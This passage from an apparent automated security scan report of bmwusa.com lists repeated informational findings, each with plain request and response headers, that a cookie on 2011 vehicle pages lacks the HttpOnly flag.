Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:22 GMT;path=/
Content-Length: 228676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.273. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:20:14 GMT;path=/
Content-Length: 228677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.274. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:35 GMT;path=/
Content-Length: 214337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.275. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:59 GMT;path=/
Content-Length: 214338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.276. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:53 GMT;path=/
Content-Length: 202023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.277. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:22 GMT;path=/
Content-Length: 214373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.278. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:58 GMT;path=/
Content-Length: 227791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.279. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:47:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:07:36 GMT;path=/
Content-Length: 215373


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.280. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:26 GMT;path=/
Content-Length: 202293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.281. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:20 GMT;path=/
Content-Length: 202294


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.282. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:01 GMT;path=/
Content-Length: 214718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.283. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.284. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:21 GMT;path=/
Content-Length: 228471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.285. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:03:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:23:16 GMT;path=/
Content-Length: 214442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.286. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
